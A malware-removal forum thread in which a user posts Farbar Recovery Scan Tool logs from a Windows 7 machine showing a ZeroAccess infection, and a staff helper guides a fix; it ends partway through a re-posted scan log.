Need fixlist.txt for Farbar Recovery Scan Tool

Discussion in 'Malware Removal Assistance For Windows' started by Mr.LucianoSno, Nov 21, 2013.


  1. Mr.LucianoSno

    Mr.LucianoSno New Member

    Hi, any help with this would be greatly appreciated.

    Here is my FRST.txt file:

    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-11-2013
    Ran by SYSTEM on MININT-5L8G8QU on 21-11-2013 01:07:36
    Running from K:\
    Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
    Internet Explorer Version 9
    Boot Mode: Recovery

    The current controlset is ControlSet001
    ATTENTION!:=====> If the system is bootable FRST could be run from normal or Safe mode to create a complete log.

    ==================== Registry (Whitelisted) ==================

    HKLM\...\Run: [NvCplDaemon] - RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
    HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-08-12] (Microsoft Corporation)
    HKLM\...\Run: [MRT] - C:\Windows\System32\MRT.exe [80541720 2013-10-26] (Microsoft Corporation)
    HKLM\...\RunOnce: [*WerKernelReporting] - %SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq [415232 2009-07-13] (Microsoft Corporation)
    HKLM\...\RunOnce: [*Restore] - C:\Windows\system32\rstrui.exe /RUNONCE [296960 2009-07-13] (Microsoft Corporation)
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKLM-x32\...\Run: [] - [x]
    HKU\Default\...\Run: [HPADVISOR] - [x]
    HKU\Default User\...\Run: [HPADVISOR] - [x]
    HKU\Fabian Zayas\...\Run: [Google Update] - C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe [136176 2012-02-03] (Google Inc.)
    SSODL: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\system32\SSCbFsMntNtf3.dll (EldoS Corporation)
    SSODL-x32: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - No File

    ==================== Services (Whitelisted) =================

    S2 DigiRefresh; C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe [77824 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 digiSPTIService; C:\Program Files (x86)\Digidesign\Pro Tools\digiSPTIService.exe [159744 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation)
    S2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
    S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366600 2013-08-12] (Microsoft Corporation)
    S2 USBMIDIAudioDevMon; C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe [1636872 2010-04-13] (M-Audio)
    S2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()

    ==================== Drivers (Whitelisted) ====================

    S3 gbridge; C:\Windows\System32\DRIVERS\gbridge64.sys [48192 2009-10-12] (Gbridge LLC)
    S3 KORGUMDS; C:\Windows\System32\Drivers\KORGUM64.SYS [31832 2010-01-07] (KORG INC.)
    S3 MAUSBMIDI; C:\Windows\System32\DRIVERS\MAudioUSBMIDI.sys [200200 2010-04-13] (M-Audio)
    S3 MBAMProtector; C:\Windows\system32\drivers\Malwarebytes Anti-Malware.sys [24176 2012-12-14] (Malwarebytes Corporation)
    S3 MBX2DFU; C:\Windows\System32\DRIVERS\MBX2DFU.sys [31120 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 MBX2MIDK; C:\Windows\System32\drivers\mbx2midk.sys [32400 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [247216 2013-06-18] (Microsoft Corporation)
    S1 MpKsl24c7195b; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl24c7195b.sys [46768 2013-10-26] (Microsoft Corporation)
    S1 MpKsl71c12e8c; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl71c12e8c.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl7de8a784; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl7de8a784.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl81550350; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl81550350.sys [46768 2013-11-01] (Microsoft Corporation)
    S2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [139616 2013-06-18] (Microsoft Corporation)
    S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
    S3 SSCBFS3; C:\Windows\System32\DRIVERS\sscbfs3.sys [347904 2013-01-30] (EldoS Corporation)
    S1 eqcpqxgh; \??\C:\Windows\system32\drivers\eqcpqxgh.sys [x]
    S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
    S1 rgqxleuo; \??\C:\Windows\system32\drivers\rgqxleuo.sys [x]

    ==================== NetSvcs (Whitelisted) ===================


    ==================== One Month Created Files and Folders ========

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-10-23 19:43 - 2013-10-23 19:43 - 38929700 _____ C:\Users\Fabian Zayas\Downloads\The Sound Of The Wolves DNB.wav

    ==================== One Month Modified Files and Folders =======

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-21 00:13 - 2010-01-19 21:39 - 00000000 ____D C:\users\Fabian Zayas
    2013-11-21 00:13 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-18 00:00 - 2009-10-31 01:17 - 01296133 _____ C:\Windows\WindowsUpdate.log
    2013-11-17 23:58 - 2012-02-03 07:03 - 00000936 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000UA.job
    2013-11-17 23:52 - 2013-03-06 22:38 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2013-11-17 23:40 - 2011-02-15 19:09 - 00000910 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2013-11-17 22:40 - 2011-02-15 19:09 - 00000906 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2013-11-17 20:58 - 2012-02-03 07:03 - 00000884 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000Core.job
    2013-11-17 19:02 - 2013-10-21 16:36 - 00000362 _____ C:\Windows\Tasks\HPCeeScheduleForFabian Zayas.job
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 06:58 - 2009-07-13 21:13 - 00726444 _____ C:\Windows\System32\PerfStringBackup.INI
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-11-08 06:51 - 2010-01-29 07:38 - 410054500 _____ C:\Windows\MEMORY.DMP
    2013-11-08 06:51 - 2010-01-29 07:38 - 00000000 ____D C:\Windows\Minidump
    2013-11-08 06:51 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2013-11-08 06:51 - 2009-07-13 20:51 - 00191847 _____ C:\Windows\setupact.log
    2013-11-01 23:01 - 2013-04-30 11:44 - 00001945 _____ C:\Windows\epplauncher.mif
    2013-11-01 23:01 - 2013-04-30 11:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Security Client
    2013-11-01 23:01 - 2013-04-30 11:41 - 00000000 ____D C:\Program Files\Microsoft Security Client
    2013-10-31 05:59 - 2010-01-19 22:39 - 00000552 _____ C:\Windows\Tasks\PCDRScheduledMaintenance.job
    2013-10-26 23:20 - 2012-05-12 23:01 - 00000000 ____D C:\Program Files\Microsoft Silverlight
    2013-10-26 23:20 - 2012-05-12 23:01 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
    2013-10-26 23:20 - 2009-08-19 02:18 - 00348350 _____ C:\Windows\PFRO.log
    2013-10-26 23:00 - 2013-08-14 23:01 - 00000000 ____D C:\Windows\System32\MRT
    2013-10-26 23:00 - 2010-02-21 23:22 - 80541720 _____ (Microsoft Corporation) C:\Windows\System32\MRT.exe
    2013-10-26 12:02 - 2013-10-21 16:36 - 00003230 _____ C:\Windows\System32\Tasks\HPCeeScheduleForFabian Zayas
    2013-10-25 16:36 - 2010-01-20 22:44 - 00000000 ____D C:\Users\Fabian Zayas\AppData\Roaming\HpUpdate
    2013-10-23 19:43 - 2013-10-23 19:43 - 38929700 _____ C:\Users\Fabian Zayas\Downloads\The Sound Of The Wolves DNB.wav
    2013-10-22 22:04 - 2012-02-03 07:04 - 00002409 _____ C:\Users\Fabian Zayas\Desktop\Google Chrome.lnk
    2013-10-22 21:35 - 2011-02-15 19:09 - 00003906 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
    2013-10-22 21:35 - 2011-02-15 19:09 - 00003654 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

    ZeroAccess:
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda
    C:\Windows\svchost.exe
    ATTENTION ====> Check for partition/boot infection.

    Files to move or delete:
    ====================
    C:\ProgramData\0949343.pad
    C:\ProgramData\4v7x6c2B2.dat
    C:\Users\Fabian Zayas\audacity-win-1.2.6.exe
    C:\Users\Fabian Zayas\switchsetup.exe
    C:\Users\Fabian Zayas\utorrent.exe


    Some content of TEMP:
    ====================
    C:\Users\Fabian Zayas\AppData\Local\Temp\50or.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\alw8tfq0.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\bitool.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\Bonjour64Setup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\bpuninstall.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\burnsetup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\default_pack_installer.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\emhumjj-.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\ffmpeg15.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\FlashPlayer.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\intrau3.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\oyhilrl7.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\tspohk6x.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\uninst.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\vpsetup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\wctikeq3.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\xtj1ygy9.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\zfqyfyh4.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\zipsetup.exe


    ==================== Known DLLs (Whitelisted) ================


    ==================== Bamital & volsnap Check =================

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\SysWOW64\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe => MD5 is legit
    C:\Windows\SysWOW64\explorer.exe => MD5 is legit
    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe => MD5 is legit
    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
    ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64

    ==================== EXE ASSOCIATION =====================

    HKLM\...\.exe: exefile => OK
    HKLM\...\exefile\DefaultIcon: %1 => OK
    HKLM\...\exefile\open\command: "%1" %* => OK

    ==================== Restore Points =========================

    19
    Restore point made on: 2013-10-28 23:00:15
    Restore point made on: 2013-10-29 23:00:15
    Restore point made on: 2013-10-30 23:00:14
    Restore point made on: 2013-10-31 23:00:15
    Restore point made on: 2013-11-01 23:00:24
    Restore point made on: 2013-11-02 23:00:20
    Restore point made on: 2013-11-03 00:00:16
    Restore point made on: 2013-11-08 06:53:45
    Restore point made on: 2013-11-09 00:00:26
    Restore point made on: 2013-11-10 00:00:15
    Restore point made on: 2013-11-11 00:00:14
    Restore point made on: 2013-11-12 00:00:15
    Restore point made on: 2013-11-13 00:00:15
    Restore point made on: 2013-11-14 00:00:15
    Restore point made on: 2013-11-15 00:00:15
    Restore point made on: 2013-11-16 00:00:15
    Restore point made on: 2013-11-17 00:00:15
    Restore point made on: 2013-11-18 00:00:15
    Restore point made on: 2013-11-19 00:00:14

    ==================== Memory info ===========================

    Percentage of memory in use: 19%
    Total physical RAM: 3966.49 MB
    Available physical RAM: 3197.69 MB
    Total Pagefile: 3964.69 MB
    Available Pagefile: 3217.93 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.87 MB

    ==================== Drives ================================

    Drive c: (HP) (Fixed) (Total:453.72 GB) (Free:244.97 GB) NTFS
    Drive e: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]
    Drive f: (Repair disc Windows 7 64-bit) (CDROM) (Total:0.24 GB) (Free:0 GB) UDF
    Drive k: () (Removable) (Total:7.45 GB) (Free:0.99 GB) FAT32
    Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
    Drive y: (SYSTEM) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 466 GB) (Disk ID: 1549F232)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=454 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=12 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 5 (Size: 7 GB) (Disk ID: 00000000)
    Partition 1: (Not Active) - (Size=7 GB) - (Type=0B)


    LastRegBack: 2013-11-09 21:03

    ==================== End Of Log ============================
     
  2. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Hi, I'll be working with you. We'll start here, and a moderator will move this thread to the appropriate forum.

    [attachment=6300]

    On your clean PC, download the following file by right-clicking it and selecting Save As


    and save it onto your flash drive.

    Then, boot to system recovery, plug in your flash drive, open FRST and click fix. Post the generated log.

    Attempt to boot normally.
     

  3. Mr.LucianoSno

    Mr.LucianoSno New Member

    Thank you for your quick response.

    I attempted to boot normally and my computer still freezes on the same black screen.

    Here is my fixlog:

    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 18-11-2013
    Ran by SYSTEM at 2013-11-22 22:58:16 Run:1
    Running from K:\
    Boot Mode: Recovery
    ==============================================

    Content of fixlist:
    *****************
    S1 eqcpqxgh; \??\C:\Windows\system32\drivers\eqcpqxgh.sys [x]
    S1 rgqxleuo; \??\C:\Windows\system32\drivers\rgqxleuo.sys [x]
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda
    C:\Windows\svchost.exe
    C:\ProgramData\0949343.pad
    C:\ProgramData\4v7x6c2B2.dat
    C:\Users\Fabian Zayas\AppData\Local\Temp
    DeleteJunctionsIndirectory: C:\Windows\system64

    *****************

    eqcpqxgh => Service deleted successfully.
    rgqxleuo => Service deleted successfully.
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda => Moved successfully.
    C:\Windows\svchost.exe => Moved successfully.
    C:\ProgramData\0949343.pad => Moved successfully.
    C:\ProgramData\4v7x6c2B2.dat => Moved successfully.
    C:\Users\Fabian Zayas\AppData\Local\Temp => Moved successfully.
    Error: DeleteJunctionsIndirectory: C:\Windows\system64 => entry should be fixed outside recovery mode.

    ==== End of Fixlog ====
     
  4. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Can you re-run FRST and attach the fresh report...
     
  5. Mr.LucianoSno

    Mr.LucianoSno New Member

    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-11-2013
    Ran by SYSTEM on MININT-5L8G8QU on 21-11-2013 01:07:36
    Running from K:\
    Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
    Internet Explorer Version 9
    Boot Mode: Recovery

    The current controlset is ControlSet001
    ATTENTION!:=====> If the system is bootable FRST could be run from normal or Safe mode to create a complete log.

    ==================== Registry (Whitelisted) ==================

    HKLM\...\Run: [NvCplDaemon] - RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
    HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-08-12] (Microsoft Corporation)
    HKLM\...\Run: [MRT] - C:\Windows\System32\MRT.exe [80541720 2013-10-26] (Microsoft Corporation)
    HKLM\...\RunOnce: [*WerKernelReporting] - %SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq [415232 2009-07-13] (Microsoft Corporation)
    HKLM\...\RunOnce: [*Restore] - C:\Windows\system32\rstrui.exe /RUNONCE [296960 2009-07-13] (Microsoft Corporation)
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKLM-x32\...\Run: [] - [x]
    HKU\Default\...\Run: [HPADVISOR] - [x]
    HKU\Default User\...\Run: [HPADVISOR] - [x]
    HKU\Fabian Zayas\...\Run: [Google Update] - C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe [136176 2012-02-03] (Google Inc.)
    SSODL: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\system32\SSCbFsMntNtf3.dll (EldoS Corporation)
    SSODL-x32: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - No File

    ==================== Services (Whitelisted) =================

    S2 DigiRefresh; C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe [77824 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 digiSPTIService; C:\Program Files (x86)\Digidesign\Pro Tools\digiSPTIService.exe [159744 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation)
    S2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
    S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366600 2013-08-12] (Microsoft Corporation)
    S2 USBMIDIAudioDevMon; C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe [1636872 2010-04-13] (M-Audio)
    S2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()

    ==================== Drivers (Whitelisted) ====================

    S3 gbridge; C:\Windows\System32\DRIVERS\gbridge64.sys [48192 2009-10-12] (Gbridge LLC)
    S3 KORGUMDS; C:\Windows\System32\Drivers\KORGUM64.SYS [31832 2010-01-07] (KORG INC.)
    S3 MAUSBMIDI; C:\Windows\System32\DRIVERS\MAudioUSBMIDI.sys [200200 2010-04-13] (M-Audio)
    S3 MBAMProtector; C:\Windows\system32\drivers\Malwarebytes Anti-Malware.sys [24176 2012-12-14] (Malwarebytes Corporation)
    S3 MBX2DFU; C:\Windows\System32\DRIVERS\MBX2DFU.sys [31120 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 MBX2MIDK; C:\Windows\System32\drivers\mbx2midk.sys [32400 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [247216 2013-06-18] (Microsoft Corporation)
    S1 MpKsl24c7195b; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl24c7195b.sys [46768 2013-10-26] (Microsoft Corporation)
    S1 MpKsl71c12e8c; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl71c12e8c.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl7de8a784; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl7de8a784.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl81550350; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl81550350.sys [46768 2013-11-01] (Microsoft Corporation)
    S2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [139616 2013-06-18] (Microsoft Corporation)
    S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
    S3 SSCBFS3; C:\Windows\System32\DRIVERS\sscbfs3.sys [347904 2013-01-30] (EldoS Corporation)
    S1 eqcpqxgh; \??\C:\Windows\system32\drivers\eqcpqxgh.sys [x]
    S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
    S1 rgqxleuo; \??\C:\Windows\system32\drivers\rgqxleuo.sys [x]

    ==================== NetSvcs (Whitelisted) ===================


    ==================== One Month Created Files and Folders ========

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-10-23 19:43 - 2013-10-23 19:43 - 38929700 _____ C:\Users\Fabian Zayas\Downloads\The Sound Of The Wolves DNB.wav

    ==================== One Month Modified Files and Folders =======

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-21 00:13 - 2010-01-19 21:39 - 00000000 ____D C:\users\Fabian Zayas
    2013-11-21 00:13 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-18 00:00 - 2009-10-31 01:17 - 01296133 _____ C:\Windows\WindowsUpdate.log
    2013-11-17 23:58 - 2012-02-03 07:03 - 00000936 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000UA.job
    2013-11-17 23:52 - 2013-03-06 22:38 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2013-11-17 23:40 - 2011-02-15 19:09 - 00000910 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2013-11-17 22:40 - 2011-02-15 19:09 - 00000906 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2013-11-17 20:58 - 2012-02-03 07:03 - 00000884 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000Core.job
    2013-11-17 19:02 - 2013-10-21 16:36 - 00000362 _____ C:\Windows\Tasks\HPCeeScheduleForFabian Zayas.job
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 06:58 - 2009-07-13 21:13 - 00726444 _____ C:\Windows\System32\PerfStringBackup.INI
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-11-08 06:51 - 2010-01-29 07:38 - 410054500 _____ C:\Windows\MEMORY.DMP
    2013-11-08 06:51 - 2010-01-29 07:38 - 00000000 ____D C:\Windows\Minidump
    2013-11-08 06:51 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2013-11-08 06:51 - 2009-07-13 20:51 - 00191847 _____ C:\Windows\setupact.log
    2013-11-01 23:01 - 2013-04-30 11:44 - 00001945 _____ C:\Windows\epplauncher.mif
    2013-11-01 23:01 - 2013-04-30 11:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Security Client
    2013-11-01 23:01 - 2013-04-30 11:41 - 00000000 ____D C:\Program Files\Microsoft Security Client
    2013-10-31 05:59 - 2010-01-19 22:39 - 00000552 _____ C:\Windows\Tasks\PCDRScheduledMaintenance.job
    2013-10-26 23:20 - 2012-05-12 23:01 - 00000000 ____D C:\Program Files\Microsoft Silverlight
    2013-10-26 23:20 - 2012-05-12 23:01 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
    2013-10-26 23:20 - 2009-08-19 02:18 - 00348350 _____ C:\Windows\PFRO.log
    2013-10-26 23:00 - 2013-08-14 23:01 - 00000000 ____D C:\Windows\System32\MRT
    2013-10-26 23:00 - 2010-02-21 23:22 - 80541720 _____ (Microsoft Corporation) C:\Windows\System32\MRT.exe
    2013-10-26 12:02 - 2013-10-21 16:36 - 00003230 _____ C:\Windows\System32\Tasks\HPCeeScheduleForFabian Zayas
    2013-10-25 16:36 - 2010-01-20 22:44 - 00000000 ____D C:\Users\Fabian Zayas\AppData\Roaming\HpUpdate
    2013-10-23 19:43 - 2013-10-23 19:43 - 38929700 _____ C:\Users\Fabian Zayas\Downloads\The Sound Of The Wolves DNB.wav
    2013-10-22 22:04 - 2012-02-03 07:04 - 00002409 _____ C:\Users\Fabian Zayas\Desktop\Google Chrome.lnk
    2013-10-22 21:35 - 2011-02-15 19:09 - 00003906 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
    2013-10-22 21:35 - 2011-02-15 19:09 - 00003654 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

    ZeroAccess:
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda
    C:\Windows\svchost.exe
    ATTENTION ====> Check for partition/boot infection.

    Files to move or delete:
    ====================
    C:\ProgramData\0949343.pad
    C:\ProgramData\4v7x6c2B2.dat
    C:\Users\Fabian Zayas\audacity-win-1.2.6.exe
    C:\Users\Fabian Zayas\switchsetup.exe
    C:\Users\Fabian Zayas\utorrent.exe


    Some content of TEMP:
    ====================
    C:\Users\Fabian Zayas\AppData\Local\Temp\50or.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\alw8tfq0.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\bitool.dll
